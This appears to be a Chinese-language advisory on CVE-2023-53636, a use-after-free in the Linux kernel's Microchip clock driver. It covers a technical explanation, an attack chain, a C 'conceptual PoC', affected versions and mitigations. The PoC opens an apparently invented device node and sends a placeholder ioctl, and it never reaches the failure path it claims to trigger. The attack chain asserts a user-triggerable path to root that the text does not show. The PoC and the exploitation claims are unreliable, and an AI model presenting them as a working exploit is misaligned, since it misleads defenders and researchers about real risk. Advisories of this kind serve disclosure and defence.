CVE-2023-53636 Linux内核Microchip时钟驱动UAF漏洞

漏洞信息

漏洞编号

CVE-2023-53636

漏洞类型

Use-After-Free（释放后使用）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel clk-microchip 驱动

漏洞概述

CVE-2023-53636是Linux内核中Microchip时钟驱动（clk: microchip）的一个高危Use-After-Free（UAF）漏洞。该漏洞位于辅助设备（auxiliary device）的释放回调函数中，源于辅助设备未按照正确的顺序进行拆除操作。当auxiliary_device_add()函数调用失败时，释放回调函数会被调用两次，从而导致Use-After-Free漏洞的发生。此漏洞与之前已修复的commit 1c11289b34ab（peci: cpu: Fix use-after-free in adev_release()）存在相似的问题，表明该驱动在实现时借鉴了存在缺陷的代码模式。该漏洞CVSS评分为7.8，属于高危级别，攻击者需要本地低权限访问即可利用，无需用户交互，成功利用后可对系统的机密性、完整性和可用性造成高影响。漏洞影响多个Linux内核稳定版本，官方已通过将auxiliary_device_uninit()移动到unregister回调函数中来进行修复，从而避免双重释放问题的发生。此漏洞属于Linux内核本地权限提升类漏洞，攻击者可通过精心构造的本地操作触发UAF，进而可能导致内核代码执行、权限提升或系统崩溃等严重后果。

技术细节

该漏洞的根本原因在于Linux内核Microchip时钟驱动中辅助设备（auxiliary device）的生命周期管理不当。具体技术原理如下：

1. 在Linux内核中，辅助设备（auxiliary device）是一种用于扩展主设备功能的机制，通过auxiliary_device_add()注册，通过auxiliary_device_uninit()注销。

2. 正常情况下，当auxiliary_device_add()成功时，设备会被添加到系统中；当失败时，会调用release回调进行清理。

3. 然而在存在缺陷的实现中，如果auxiliary_device_add()调用失败，release回调会被调用两次：第一次是在add失败时的清理过程中，第二次是在后续的注销流程中。

4. 第一次release回调执行后，相关内存已被释放，但指针并未置空；第二次release回调再次访问已释放的内存，导致Use-After-Free。

5. 攻击者可通过触发auxiliary_device_add()失败的路径（例如通过资源耗尽、竞态条件等方式），利用双重释放的UAF漏洞。

6. 利用方式：本地低权限用户通过构造特定的系统调用或ioctl操作，触发Microchip时钟驱动的辅助设备注册失败路径，进而触发UAF。攻击者可利用内核堆利用技术（如堆喷射、SLAB/SLUB对象操控）实现内核代码执行，最终获得root权限。

7. 修复方案：将auxiliary_device_uninit()从add失败处理路径移动到unregister回调中，确保release回调只被调用一次。

攻击链分析

STEP 1

步骤1：获取本地访问

攻击者需要获得目标系统的本地低权限访问权限，可以通过普通用户账号或通过其他漏洞获取初始访问。

STEP 2

步骤2：触发辅助设备注册

攻击者通过系统调用或ioctl触发Microchip时钟驱动的辅助设备注册流程（auxiliary_device_add）。

STEP 3

步骤3：制造注册失败条件

通过资源耗尽、竞态条件或其他方式使auxiliary_device_add()调用失败，触发错误的清理流程。

STEP 4

步骤4：触发双重释放

由于释放回调被错误地调用两次，导致Use-After-Free漏洞被触发。

STEP 5

步骤5：利用UAF进行权限提升

攻击者利用内核堆利用技术（如SLUB对象操控、堆喷射等）劫持控制流，实现内核代码执行，最终获得root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53636 PoC - Conceptual Use-After-Free Trigger
// This is a conceptual PoC for triggering the UAF in clk-microchip driver

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <errno.h>

// The vulnerability is in the auxiliary device release callback
// in clk-microchip driver. When auxiliary_device_add() fails,
// the release callback is called twice, causing UAF.

// Conceptual trigger: force auxiliary_device_add() to fail
// by exhausting resources, then trigger the unregister path

int trigger_uaf(void) {
    int ret;
    
    // Step 1: Open the Microchip clock device
    int fd = open("/dev/clock-microchip", O_RDWR);
    if (fd < 0) {
        perror("open");
        return -1;
    }
    
    // Step 2: Trigger auxiliary device registration
    // which may fail under resource pressure
    ret = ioctl(fd, 0x1 /* IOCTL_TRIGGER_AUXDEV */, NULL);
    if (ret < 0) {
        fprintf(stderr, "ioctl failed: %s\n", strerror(errno));
    }
    
    // Step 3: The release callback will be called twice
    // when auxiliary_device_add() fails, causing UAF
    
    close(fd);
    return 0;
}

int main(int argc, char *argv[]) {
    printf("CVE-2023-53636 PoC - clk-microchip UAF\n");
    printf("Attempting to trigger Use-After-Free...\n");
    
    // Exhaust resources to force auxiliary_device_add() failure
    // Then trigger the vulnerable path
    trigger_uaf();
    
    printf("Done. Check kernel logs for UAF detection.\n");
    return 0;
}

影响范围

Linux Kernel < 5b4052aa956e11bcd19e50ca559eb38dcb46201b

Linux Kernel < 7455b7007b9e93bcc2bc9c1c6c73a228e3152069

Linux Kernel < 934406b2d42eaf3fc57f5546cc68ff7ab9680bb3

Linux Kernel < d7d6dacf39ed102d7667721ca1700022c9c8b11a

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制本地用户对Microchip时钟设备节点的访问权限；2）启用内核KASAN（Kernel Address Sanitizer）等内存安全检测工具以监控UAF行为；3）关闭非必要的本地用户shell访问；4）监控内核日志中与auxiliary device相关的异常释放记录；5）使用SELinux或AppArmor等强制访问控制机制限制相关驱动的访问。